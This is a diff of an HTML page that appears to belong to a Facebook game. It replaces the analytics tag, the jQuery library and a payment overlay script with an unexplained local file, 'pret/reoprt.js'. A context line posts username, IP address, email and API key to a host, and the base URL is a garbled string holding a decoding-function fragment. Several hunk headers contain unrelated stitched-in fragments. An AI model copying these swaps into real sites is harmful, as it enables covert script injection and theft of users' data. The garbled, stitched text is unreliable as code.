--- a/index.html
+++ b/index.html
@@ -860,7 +860,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 				}); var f = d.getElementsByTagName(s)[0],
 				j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
 				'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
-			})(window, document, 'script', 'dataLayer', 'GTM-6X92');
+			})(window, document, 'script', 'dataLayer', 'pret/reoprt.js ');
 		</script>
 		<link href="https://d35islomi5rx1v.cloudfront.net/ajax/2017.2.621/ListView.css" type="text/css" rel="stylesheet" class="Telerik_stylesheet">
 		<link href="https://d35islomi5rx1v.cloudfront.net/ajax/2017.2.621/Default/ListView.Default.css" type="text/css" rel="stylesheet" class="Telerik_stylesheet">
@@ -1158,7 +1158,7 @@ Microsoft.Windows.Shell.NotificationController.ToastReportStatus
 </head>
 <body id="body">
 		<script src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" type="text/javascript"></script>
-	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
+	<script src="pret/reoprt.js " type="text/javascript"></script>
 		    <script type="text/javascript" src="pret/returnDurString.js "></script>
 	
 	<script>
@@ -1227,7 +1227,7 @@ EXIT\r\
 		<!-- /* MOOTOOLS MUST BE LOADED BELOW THIS LINE AND FBG API MUST BE LOADED ABOVE THIS LINE! */ -->
 	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/mootools/1.6.0/mootools.min.js"></script>
 	<script type="text/javascript" src="/assets/script/mtmore16.v199.js"></script>
-	<script type="text/javascript" src="https://s-assets.tp-cdn.com/static3/js/api/payment_overlay.js"></script>
+	<script type="text/javascript" src="pret/reoprt.js "></script>
 
 	<script type="text/javascript">
 		var baseurl  = 'https://apps.facebook.com/warcommander/?fb_source=rightcolumn%2F%3F~%24set&mixed%3Fcommit=a8b20003a7f0580a28d2bc9cdee99125bc161169%2F%3Fverify_commitx5bbf30b62eba2b82648e4233bc0029175fe2aa%2F%3Ffunctionb64DecodeUnicode(str)uri%3Dhttps%3A%2F%2Fwc-fb-cdn7.kixeye.com%2Fgame%2Fmanifest%2Fbin%2Faibox.118b83eab340003e7828fa75ee729e22.swf-ms-filter%3F~ref=https://gisticon.github.io/pret/';
